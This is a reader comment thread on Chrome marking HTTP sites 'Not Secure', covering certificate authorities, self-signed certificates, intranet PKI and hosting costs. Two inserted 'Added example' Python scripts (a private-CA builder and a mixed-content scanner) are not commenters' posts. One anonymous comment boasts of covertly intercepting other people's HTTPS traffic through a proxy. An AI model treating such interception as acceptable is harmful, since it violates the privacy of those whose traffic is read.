        "What would be the point of those certs?"

        They're better than plaintext is the point. They allow any website to encrypt their traffic so it is not visible or cached by proxies, sniffers etc. In addition if they are coupled with a service such as SSL lighthouse, the browser can check that the cert is the same one other visitors to the site see and warn the user if it is not.

        It doesn't stop somebody buying a cert if they want. I'm quite certain that browsers could imbue a cert with "trust" on a scale based on who signed it or not.

        "The cost results from maintaining a certificate authority that, theoretically, checks that someone actually is who they say they are. "

        That's the point. Theoretically.

        Browsers maintain a list of hundreds of CAs. It only takes a few bad actors and the whole concept collapses. Occasionally a CA gets delisted but not half as much as it probably should.

        Besides that, many CAs barely do more than check a passport or government doc and hand out certs like candy. It's little more than an inconvenience of money / time sink to get the damned things. A tax on security.

        The concept of signing with CA and becoming "trusted" is nonsensical. Maybe if I'm a bank I want to pay a CA to come around and audit how I store my key. Somebody running a gardening tips website just wants a cert that makes a scary browser icon go away.

        Certs should be able to scale between these two cases.

  16. Bavaria Blu

    D-Day sounds melodramatic - from tomorrow Chrome will display a subtle light grey message next to the URL. Will anyone notice?

  17. User McUser
    Big Brother

    Not Secure -vs- Not Encrypted

    I object to it being labeled as "Not Secure" when "Not Encrypted" would be far more accurate and far less nasty sounding. But that's the whole point of this, to scare users and drive site operators to use HTTPS. If a user sees "Not Encrypted" they'll either not understand or not care what that means. But calling it "Not Secure" implies that Bad Things™ will happen! Because everyone is always telling them to "Be Secure" and that this is important! And now their browser is telling them their favorite website is not secure? Well, I guess I'd better steer clear of that site until they fix it; thanks Chrome for warning me!

    But why does Google care about some random WWW server being encrypted or not? Because with plain HTTP, nearly anyone can see your data and thus access that sweet sweet nectar of your browsing history. But with HTTPS, only the browser and the site you're going to get that info. It's all about trying to stop other advertising companies from getting the same info that Google will get from Chrome users. It's aimed squarely at their competitors and has nothing to do with making anything more secure. I mean FFS, the data is only encrypted during transit - once it hits the browser or the server daemon it's right back to plain text and just as (in)secure as it was before they started using HTTPS.

    1. Anonymous Coward
      Anonymous Coward

      Re: Not Secure -vs- Not Encrypted

      "I object to it being labeled as "Not Secure" when "Not Encrypted" would be far more accurate"

      No, it isn't, it is an accurate description. HTTPS provides 3 things, authentication (you know it's the site you asked for), encryption (unreadable by 3rd parties) and data integrity (no one can modify the content in transit). HTTP lacking the first and last make it not secure.

  18. DougS Silver badge

    Like I said before

    I really hope all 10.x.x.x and 192.168.x.x addresses are exempted by default, so you don't get spurious warnings talking to local devices that have no need for HTTPS.

    1. Anonymous Coward
      Anonymous Coward

      Re: Like I said before

      And ditto for 127.0.0.1 and ::1. Also special use domains like "test", "localhost" & "invalid".

      https://tools.ietf.org/html/rfc6761

    2. Richard 12 Silver badge

      More to the point

      It is technically impossible to have a valid cert for 10.0.0.0/8, 192.168.0.0/16 or 172.16.0.0/12 IP addresses, and the same with *.local.

      Or rather, any CA that issued one would be quickly blacklisted.

      So Intranet sites and dynamic hosts on private networks simply cannot be TLS without raising the "It's dangerous to go here" warning, unless they buy a public domain purely for internal use - and risk accidentally spilling it outside their walls.

      1. Anonymous Coward
        Anonymous Coward

        Re: More to the point

        "So Intranet sites and dynamic hosts on private networks simply cannot be TLS "

        Yes they can, you have your own PKI, this can be an actual CA, or simply just creating a certificate in say openssl, creating a 'CA' (trusted signing cert). As it's an intranet, where you usually have control over the computers, you add that cert in your trusted roots; all intranet sites then have a cert signed by your CA, which is trusted.

        1. Richard 12 Silver badge

          Re: More to the point

          So how does one install a trusted CA on an iPhone, Mac, Android, Windows Phone, Windows XP/7/8/8.1/10 and Windows CE?

          Without asking the CEO to go into any of the scary setup menus.

          And have that happen for every BYOD anybody might ever use?

          Of course you can't because that would be a terrible security hole.

          It is not feasible to ask normal users to install root certificates.

          As far as I'm aware, it's only possible for Windows machines logged onto the domain.

          1. Richard 12 Silver badge

            Re: More to the point

            Oh, and how do you do that without also making it trivial for a miscreant who gains some access to your network to man-in-the-middle attack everyone on that network?

            1. Anonymous Coward
              Anonymous Coward

              Re: More to the point

              "gains some access to your network to man-in-the-middle attack everyone on that network?"

              The CA would need to be compromised for that to happen, but as you appear to be advocating for not using https, MITM attacks don't worry you.

          2. Anonymous Coward
            Anonymous Coward

            Re: More to the point

            "So how does one install a trusted CA on an iPhone, Mac, Android, Windows Phone, Windows XP/7/8/8.1/10 and Windows CE?"

            I would say you don't really have much experience in anything other than a very small business or just home admin.

            As you have a lot of MS devices listed let's give you an MS solution for non-domain-joined systems, including iPhones, Android, Mac etc. Intune.
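    Added example for the private-PKI approach argued over in this sub-thread (not any commenter's script): a Python wrapper around openssl that creates an internal root CA, issues a server certificate whose subjectAltName carries a private RFC 1918 address and a .local name, and verifies the chain the way a client that trusts the root would. It assumes the openssl binary is on PATH; the host name intranet.corp.local and address 10.0.0.5 are constructed.

```python
"""Private CA for intranet hosts: root cert, leaf cert with DNS + private IP
in the SAN, chain verification.  Added example; assumes `openssl` on PATH."""
import os
import shutil
import subprocess
import tempfile

CA_KEY, CA_CRT = "ca.key", "ca.crt"


def openssl_available() -> bool:
    return shutil.which("openssl") is not None


def _openssl(args, workdir: str) -> str:
    """Run one openssl command inside workdir, raising on failure."""
    result = subprocess.run(["openssl", *args], cwd=workdir,
                            capture_output=True, text=True, check=True)
    return result.stdout


def _write(workdir: str, name: str, content: str) -> None:
    with open(os.path.join(workdir, name), "w") as f:
        f.write(content)


def build_internal_ca(host_dns: str, host_ip: str, workdir: str = None) -> dict:
    """Create the root CA and one server cert; return paths and verification results."""
    workdir = workdir or tempfile.mkdtemp(prefix="internal-ca-")
    # 1. Root CA: key, CSR, then a self-signed cert restricted to CA use.
    _openssl(["req", "-new", "-newkey", "rsa:2048", "-nodes", "-sha256",
              "-subj", "/CN=Example Internal Root CA",
              "-keyout", CA_KEY, "-out", "ca.csr"], workdir)
    _write(workdir, "ca.ext", "basicConstraints=critical,CA:TRUE\n"
                              "keyUsage=critical,keyCertSign,cRLSign\n")
    _openssl(["x509", "-req", "-in", "ca.csr", "-signkey", CA_KEY, "-days", "3650",
              "-sha256", "-extfile", "ca.ext", "-out", CA_CRT], workdir)
    # 2. Server key and CSR for the intranet host.
    _openssl(["req", "-new", "-newkey", "rsa:2048", "-nodes", "-sha256",
              "-subj", f"/CN={host_dns}", "-keyout", "server.key", "-out", "server.csr"], workdir)
    # 3. Leaf extensions.  Browsers match the SAN, not the CN; a private CA may
    #    list RFC 1918 addresses and .local names that a public CA will not issue.
    _write(workdir, "server.ext",
           f"subjectAltName=DNS:{host_dns},IP:{host_ip}\n"
           "basicConstraints=CA:FALSE\n"
           "keyUsage=critical,digitalSignature,keyEncipherment\n"
           "extendedKeyUsage=serverAuth\n")
    _openssl(["x509", "-req", "-in", "server.csr", "-CA", CA_CRT, "-CAkey", CA_KEY,
              "-CAcreateserial", "-days", "397", "-sha256",
              "-extfile", "server.ext", "-out", "server.crt"], workdir)
    # 4. Verify the chain exactly as a client that trusts ca.crt would.
    verify = subprocess.run(["openssl", "verify", "-CAfile", CA_CRT, "server.crt"],
                            cwd=workdir, capture_output=True, text=True)
    text = _openssl(["x509", "-in", "server.crt", "-noout", "-text"], workdir)
    san = next((line.strip() for line in text.splitlines() if "DNS:" in line), "")
    return {"workdir": workdir, "verify_ok": verify.returncode == 0, "san": san,
            "ca_cert": os.path.join(workdir, CA_CRT)}   # ca.crt is what clients get; ca.key stays offline


def demo_checks() -> dict:
    """Stand-alone run; 'ran' is False when openssl is not installed."""
    if not openssl_available():
        return {"ran": False, "verify_ok": False, "san_ok": False}
    r = build_internal_ca("intranet.corp.local", "10.0.0.5")
    return {"ran": True, "verify_ok": r["verify_ok"],
            "san_ok": "DNS:intranet.corp.local" in r["san"] and "10.0.0.5" in r["san"]}


if __name__ == "__main__":
    print(demo_checks())
```

    Only ca.crt is distributed to client trust stores (by MDM, group policy or whatever the estate supports, which is the part of the problem the replies above disagree about); ca.key is the thing an intruder would need to forge certificates for that network, so it belongs on an offline or tightly controlled machine, and the leaf certificates it signs should be short-lived and name-constrained to the intranet hosts they are for.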

  19. Maelstorm
    Mushroom

    What right does Google really have to dictate to independent websites on what protocols they can use? Especially on an intranet where both endpoints belong to the same entity? This is Google becoming the North Korea of the internet.

    As for getting a cert, just self-sign your own. That's what I did. I became my own CA and rolled the cert out to all machines on the LAN. It's a pain in the arse, but what can you do when you have a company who thinks they can dictate internal company policy.

    Time to dump Chrome and go for a different browser...I hear that Opera is pretty good.

    1. dbtx Bronze badge

      re: Opera

      I tried Vivaldi for a while, then I figured out that precompiled binary means severely poorly optimized. While it needed to do stuff like draw on the screen-- open the window at first, change to another tab, etc., my *audio* would crackle because the buffer size on the sound server was apparently too low to cope with the load. It probably was using tons of statically linked stuff instead of my local bits, all baked the same (sad) way. And it probably could've been mitigated by a realtime kernel, and I can't exactly get into that then or now, so... if I can't compile it, I don't care. Chromium will probably do the same opinion-pushing thing, or already has done- but at least it could be patched to piss off about security blankets.

      Q: What's the difference between a marketing campaign and wetware hacking?

      A: Powdermilk Biscuits.

    2. Cavanuk

      "What right does Google really have to dictate..." their browser, their rules. Don't like it? Use something else. Simple.

  20. Kevin McMurtrie Silver badge

    Certified authentic malware

    All the advertising malware, all the malware in Google Play Store, all the cheap certificates that don't declare an owner, and all the server-side break-ins hardly make HTTPS a cure for anything. About all it's good for is preventing US ISPs from injecting more ads, malware, and trackers.

    1. tom dial Silver badge

      Re: Certified authentic malware

      "[P]reventing US ISPs from injecting more ads, malware, and trackers." That would seem a good enough thing by itself, although because I run an ad blocker I am not sure how much it is a real problem at present.

  21. Craig100

    Shared hosting licking their lips

    I'm with the guys who say not all sites need HTTPS. It's all very well if you're running your own servers or VMs but shared hosting ISPs charge a fortune for certs and hardly any use Let's Encrypt. Why would they when they'd lose so much money. A few of my clients are micro-businesses or charities and wouldn't stand the extra costs. They're on shared hosting 'cos it's cheap.

    Google should pull its neck in. All for security where it's needed, otherwise, piss off!

    1. SImon Hobson Silver badge

      Re: Shared hosting licking their lips

      Exactly.

      At present, one of my sites (purely informational, completely static) is hosted under my own domain name using hosting that's bundled with my internet connection. They don't offer the option of hosting the same site with SSL unless I host it as something like "sharedhosting.isp.tld/myaccountname". So to go SSL I would need to pay to host it somewhere else - so stuff you all those "but SSL is free" id10ts.

      More annoyingly, the fact that it seems browsers and search engines are pushing users to the SSL enabled site that isn't - means that users (correctly) get a certificate error, and if they continue past that then they get the ISP's generic sales page and not my site.

      And where I used to work, we used one of the larger UK based hosting outfits for customer sites, and no they didn't support LetsEncrypt - IIRC it was something like an extra £30/year for an SSL cert on your site.

      IME most small sites are on shared hosting. IME a lot of hosting outfits do not offer free or very cheap SSL certs. Yes, there is a real £££ (or $$$ or €€€ or ...) cost in going SSL for a great many site owners.

  22. Anonymous Coward
    Anonymous Coward

    Money talks...

    Why do we need those dumb CAs anyway? Heck: why do we need to pay for all this?

    Why can't I have a DNS record which shares my public key and which is used to encrypt and verify my website running on the same domain? How direct can it get? In order to abuse this you'd need to have access to both the domain registration and the physical website.

    Best of all: this would also allow average Joe to use his own set of keys because the only important link is between DNS security record and the website itself.

    No: SSL isn't free for everyone. Not everyone has the know-how about the underlying mechanics, and all which Google's narcissistic policy does is provide a platform for some hosting providers to generate even more revenue. While the alleged "enhanced security" is seriously disputable.

    1. Kanhef

      Re: Money talks...

      What happens if and when someone is able to hijack the DNS record? By changing the public key, they can redirect traffic to a site they control which will be 'verified' as the real thing. Putting both address and authentication information in the same record creates a single point of failure.

      1. Drew 11

        Re: Money talks...

        Errr, if someone is able to hijack your DNS record, then no amount of security is going to help you.

    2. Drew 11

      Re: Money talks...

      Errrr, you CAN have a DNS record that shares your public key. It's called DNSSEC and it's running right now.

      I have it all set up, but browsers still complain because DANE isn't baked in because the big browser owners don't want to lose control.

      ICANN and their SSAC should be complaining loudly but they're too busy feathering their own nests with the very browser writers that are the problem. Allegedly.

    3. Anonymous Coward
      Anonymous Coward

      Re: Money talks...

      "Why can't I have a DNS record which shares my public key and which is used to encrypt and verify my website running on the same domain? How direct can it get? In order to abuse this you'd need to have access to both the domain registration and the physical website."

      That wouldn't work, your site can then be redirected and would appear legit as it would only require the DNS server to be compromised by anyone, this includes any ISP DNS or 3rd party in the chain. They can then set the site IP and public key to anything they like and your users wouldn't know any different.

  23. tekHedd

    Not about encryption

    The dangers of unencrypted transmissions? Sure it's real, but no, that's not a problem that is solved by this move. The real end result of this move is the death of self-signed certs.

    Why does Google hate self-signed certs?

    1. Kanhef

      Re: Not about encryption

      Because they're worse than useless: they make a site look secure, but don't actually make it any more secure than an HTTP-only site. Anyone can write a self-signed cert for any domain, so MITM attacks are easy: the attacker just makes their own self-signed cert, and it looks just as valid as the original.

      1. Drew 11

        Re: Not about encryption

        Not if the domain is running DNSSEC.

  24. DCFusor Silver badge

    hmmm

    Noticing that what seems like a majority of those saying "just do it" are AC. That's interesting, wonder who they really are and why they think they have to be AC?

    For the guy who says someone doesn't know how crypto works - do you check your keys for the right primality properties yourself? Maybe you're the one who doesn't know the subject well enough.

  25. Camilla Smythe
    IT Angle

    Um-Kay

    Let me just do that for my Raspberry Pi.

    https://letsencrypt.org/getting-started/

    Looks like I need Certbot for Debian Stretch...

    https://certbot.eff.org/lets-encrypt/debianstretch-apache

    Err... need to do something about backports...

    https://backports.debian.org/Instructions/

    Now we have to Dick about with 'clarity' of the instructions. Dick Dick Dick..

    sudo apt-get update

    Reading package lists... Done

    W: GPG error: http://ftp.debian.org/debian stretch-backports InRelease: The following signatures couldn't be verified because the public key is not available: NO_PUBKEY 8B48AD6246925553 NO_PUBKEY 7638D0442B90D010

    W: The repository 'http://ftp.debian.org/debian stretch-backports InRelease' is not signed.

    N: Data from such a repository can't be authenticated and is therefore potentially dangerous to use.

    N: See apt-secure(8) manpage for repository creation and user configuration details.

    Looks like that is fucked then.

    LetsEncrypt - - - - LetsNotBother

    ... and don't give me no PEBCAK.

    I worked out your stupid instructions and it fell over.

    ... and don't tell me the fault lies with Debian or RPi

    If you tell me to use someone else's shit to use your shit you better make sure the other shit works with your shit,,, and my shit.

    You may consider this to be my bug report.

    FFS. Falls over on a Public Key Error.

    1. Anonymous Coward
      Anonymous Coward

      Re: Um-Kay

      man apt-secure

      Looks like you need to install the repository key. The exact command to do so is left as an exercise for the reader, but there are at least two correct solutions.

      RTFM.

      PEBCAK.

      1. Camilla Smythe

        Re: Um-Kay

        Looks like you need to install the repository key. The exact command to do so is left as an exercise for the reader.

        And that just about sums your fuck up.

  26. Dabbb Bronze badge

    It's all about ads

    Does anyone really believe Google has some good intentions? Doesn't anyone remember how they make their money?

    First you can't cut ads on a proxy because of HTTPS, later they ban adblockers in Chrome. That's what Microsoft did when they put updates and tracking servers on the same IPs so you can't block one without blocking the other.

  27. G.Y.

    gateways

    https: gets mad when I have to log on to a gateway (e.g. Starbucks) to get on the internet. I learnt to use http://xxxx.com to get to their login. (Used to use xxx.com, but one place came back with "why this porn site??")

  28. Astara

    HTTPS everywhere benefits google ensuring you download their ads

    The main beneficiary of HTTPS everywhere (given that anyone who cares about security will likely be breaking the encryption via MITM certs) is Google.

    It used to be that I could store about 20% of web requests (by request or byte count... varied, but averaged out the same) locally. On some sites, that would hit 40% -- but with HTTPS -- it falls to zero, because individual requests can no longer be seen or stored.

    This means good adverts that refresh each time you fetch them can be fresh each time, or all those wizzy scripts and icons... fresh each time... and it does slow things down -- housemate noticed a 50% boost in his youtube browsing with it caching all of the video icons... (not all of us are on google fiber even if it was offered in any significant market percentage)... I've never had to worry about someone altering my web pages in transit. Now -- even if you have an ad blocker -- many things will still get downloaded before they are blocked (some won't), but so many things like fonts on every page are fairly constant as are many images and could be cached if not encrypted.

    So HTTPS everywhere is helping google more than anyone else. Security my bum!

    1. Anonymous Coward
      Anonymous Coward

      Re: HTTPS everywhere benefits google ensuring you download their ads

      What on earth are you on about? HTTPS can be cached just the same as HTTP!

      And what on earth does "a 50% boost in his youtube browsing" mean? The size of anything on YouTube that is able to be cached is going to be significantly smaller than a number of videos being watched.

      And lastly, youtube.com will default to HTTPS so your comment about caching on YouTube neatly contradicts your comment about HTTPS requests "can no longer be seen or stored".

  29. david 12 Bronze badge

    8 bit web devices on private network.

    8 bit devices means the largest block of memory I can handle is 256 bytes, and the total memory I have is actually 2K. Which isn't enough to handle 256 bit encryption, let alone 4Kbit encryption keys.

    I don't mind so much at home -- I've got service fast enough to handle the advertising download -- but for work this sucks donkey balls. And I've got 3rd world clients with 10yr-old PCs and 5yr-old phones.

  30. Tony W

    After all that fuss ...

    All you see is a little "i" in a circle. I noticed it only because I was looking for it.

    It's still nonsense, as when I clicked on the symbol I was told not to enter a password in my BT router. How can I control it without a password? I suppose all such equipment will have to have secure connections in future, with extra cost for certificate renewal and dreadful warnings when they get it wrong.

    But phishing sites will get the green padlock of approval (with a nice free cert from Letsencrypt). Anyone who notices will get a false sense of security.

  31. EastFinchleyite

    Self Signed Certificates

    I run both FTP and Web servers on my home PCs for personal use and have hidden them behind obscure ports and have strong password protection. On both I use self signed certificates.

    That is good enough for me. If it is not good enough for Google then screw them, there are other browsers out there.

  32. Sleep deprived
    Unhappy

    Not so simple

    I have a small static HTML page from which users can download my freeware. No forms, no e-commerce. My ISP gave me an early warning of Google's upcoming handling of http traffic, so following their help page, I got a LetsEncrypt certificate, added an .htaccess file to redirect traffic to https, and then my webpage went blank due to "mixed content" where my webpage has http references to outside articles, etc. Not much I could do about that, so I just reverted to http.
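    Added example (not the commenter's page or the ISP's help page): a Python scanner, built on the standard library's HTML parser, that finds the http:// references which turn a page into "mixed content" once it is served over https. It distinguishes the sub-resources browsers block outright (scripts, stylesheets, frames, which is what blanks a page) from those that merely draw a warning (images, media), and it ignores ordinary <a href> links to outside articles, which are navigation and not mixed content at all. The sample HTML and host names are constructed.

```python
"""Find http:// sub-resource references that become mixed content on an
https page.  Added example; sample HTML below is constructed."""
from html.parser import HTMLParser
from urllib.parse import urlsplit

# (tag, attribute) pairs that fetch a sub-resource.  Browsers block the
# "active" kinds, which is what leaves a page blank; "passive" kinds load
# but trigger a warning.  <a href> is navigation and deliberately absent.
ACTIVE = {("script", "src"), ("iframe", "src"), ("link", "href"),
          ("object", "data"), ("embed", "src")}
PASSIVE = {("img", "src"), ("audio", "src"), ("video", "src"), ("source", "src")}


class MixedContentScanner(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []   # (severity, tag, url) in document order

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        for table, severity in ((ACTIVE, "blocked"), (PASSIVE, "warning")):
            for t, a in table:
                url = attrs.get(a)
                if tag != t or not url:
                    continue
                # <link> only fetches a resource when it is a stylesheet;
                # rel=canonical and friends are metadata, not mixed content.
                if tag == "link" and "stylesheet" not in (attrs.get("rel") or "").lower():
                    continue
                # Scheme-relative ("//host/x") and https URLs are fine on an https page.
                if urlsplit(url).scheme.lower() == "http":
                    self.findings.append((severity, tag, url))


def scan(html: str) -> list:
    """Return every http:// sub-resource reference found in the markup."""
    parser = MixedContentScanner()
    parser.feed(html)
    parser.close()
    return parser.findings


def summarise(findings: list) -> dict:
    """Counts per severity plus whether anything would be hard-blocked."""
    blocked = [f for f in findings if f[0] == "blocked"]
    return {"blocked": len(blocked), "warning": len(findings) - len(blocked),
            "page_breaks": bool(blocked)}


# Constructed sample page: one blocked stylesheet, one warned image,
# and several references that are not mixed content at all.
SAMPLE_HTML = """<html><head>
<link rel="stylesheet" href="http://cdn.example.net/site.css">
<link rel="canonical" href="http://www.example.org/">
<script src="https://cdn.example.net/app.js"></script>
</head><body>
<p>See <a href="http://www.example.org/article">this article</a>.</p>
<img src="http://img.example.org/logo.png">
<img src="//img.example.org/hero.png">
</body></html>"""

if __name__ == "__main__":
    found = scan(SAMPLE_HTML)
    for severity, tag, url in found:
        print(f"{severity:8} <{tag}> {url}")
    print(summarise(found))
```

    Each "blocked" finding needs its URL changed to an https one the third party actually serves (or the asset copied to your own host); "warning" findings only degrade the padlock. The scanner does not look inside CSS `url()` values or script-built URLs, so treat an empty result as necessary rather than sufficient, and confirm in the browser's developer console after the switch.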

  33. Cavanuk

    Some years ago, I worked for a government agency that had an informational website that didn't require login and so was not HTTPS. Someone started intercepting our pages so that the page visitors saw was not what we were hosting. The interception took the form of the text "(a**hole!)" being inserted after the name of every senior staff member. Switching to HTTPS solved the problem.

    The purpose of HTTPS is not solely to encrypt data so that bad actors can't see your password. It tells your browser that you are communicating with the entity you think you're communicating with. It prevents tampering with the data in transit.

    1. Anonymous Coward
      Anonymous Coward

      Have an upvote. A good example of why the "nothing to hide, nothing to fear" logic isn't particularly useful in this discussion.

      Though I wish I could also give an upvote to whoever tampered with your government website in transit... that was a top effort.

  34. Anonymous Coward
    Anonymous Coward

    HTTPS will never prevent the middle men....

    Not only do browsers and search bots favor HTTPS sites, it prevents your pages being tampered with while in transit

    What a lying post. Anyone who doesn't think they can get a signed certificate into squid that the other computers just see as a wildcard for the whole internet is not doing what I am doing. HTTPS is fully capable of being used through a proxy and the ignorance of this just allows me to be a middle man without you folks ever suspecting. Thank you for the freedom for me to continue to do this.

    1. Anonymous Coward
      Anonymous Coward

      Re: HTTPS will never prevent the middle men....

      Don't you also have to get your wildcard cert included in the trusted CA list of any browser that forwards traffic via your squid, else the users see "not secure" flags in the address bar? Relatively easy if you control the clients (i.e. you're doing this for the purpose of corporate URL monitoring/antivirus etc), but not trivial if you're trying to compromise client machines you don't own.

  35. Compression Artifact

    I just spoke with tech support at the web host I use for my personal site, which is just a couple of trivial HTML pages I upload with an FTP client. They said they only support https at their grade of service that is two price tiers more expensive than anyone would use for a personal site. The additional ongoing cost would be over $300 per year. I think I'll pass on it.

    1. Anonymous Coward
      Anonymous Coward

      @ Compression Artifact: As we said, find a less shit web host.

      The web host I use costs about 1/4 of the “extra” cost that your host wants to charge you, and provides LetsEncrypt certs for free, at the literal (one time) click of a control panel button.

      At that sort of extra cost, we have to wonder what else your host is charging you uncompetitive prices for?

  36. Anonymous Coward
    Anonymous Coward

    "Noticing that what seems like a majority of those saying "just do it" are AC. That's interesting, wonder who they really are and why they think they have to be AC?"

    For me it's because I work for the NSA/MI5/web hosting/CA spying conglomerates and my username says so, didn't want to show my ulterior motives.

    Damn it, gave it away

  37. Nematode

    "Although Chrome is the first mainstream browser to affix high-visibility warnings system to non-HTTPS websites"

    Huh? Firefox has been doing this for yonks

  38. iwrconsultancy

    Cartel situation.

    SSL/HTTPS is supposed to protect high importance sites, and when used correctly, it does so.

    The mass rollout compromises its ability to protect high importance sites.

    We already have a situation with Let's Encrypt, where a fraudster can very easily create a spoof site with a padlock, something which would have been difficult when that required a proper certificate involving human checking of the request. Thus, the value of SSL as an indicator of safety on banking sites has been seriously degraded.

    That, and on sites with advertising, HTTPS does NOT prevent MITM attacks, because any advertiser can inject a keylogger into the browser. Guess who serves most of the advertising? Yep, the same corporation pushing universal HTTPS.

    Perhaps worst though, is the blaze of propaganda that's been put around hyping SSL as a 'miracle cure' for IT security. This is no less than snake oil selling. SSL has its uses, as does snake oil (it's actually for rubbing on sore feet). Neither is a cure-all though, and by convincing people that it will offer blanket protection it will lead to other more effective protective measures being dropped. That will be bad. It will result in people being hit by ransomware, etc when they otherwise might have taken effective precautions.

    Our analysis:

    https://iwrconsultancy.co.uk/blog/https


Biting the hand that feeds IT © 1998–2019